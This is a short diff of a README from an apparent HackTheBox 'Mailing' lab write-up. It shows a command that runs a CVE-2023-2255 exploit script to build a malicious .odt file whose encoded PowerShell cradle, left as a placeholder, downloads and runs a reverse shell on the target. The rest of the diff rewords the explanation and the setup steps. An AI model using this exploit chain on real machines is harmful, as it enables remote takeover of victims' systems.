DIOEK/Mailing-HTB/README.md

 ```bash
 python CVE-2023-2255.py --cmd 'cmd /c powershell -enc <your-cradle>' --output exploit.odt
 ```
-Practically, what that does is create a malicious .odt file that contains instructions, so that a reverse shell is downloaded unto the target machine and executed.
+Here the malicious .odt file is created.
+It contains instructions so that a reverse shell is downloaded unto the target machine and executed.
-Next create a wwww directory and move it into CVE-2023-2255 directory:
+Next create a 'wwww' directory and move it into CVE-2023-2255 directory:
 ```bash
 mkdir wwww
 cd www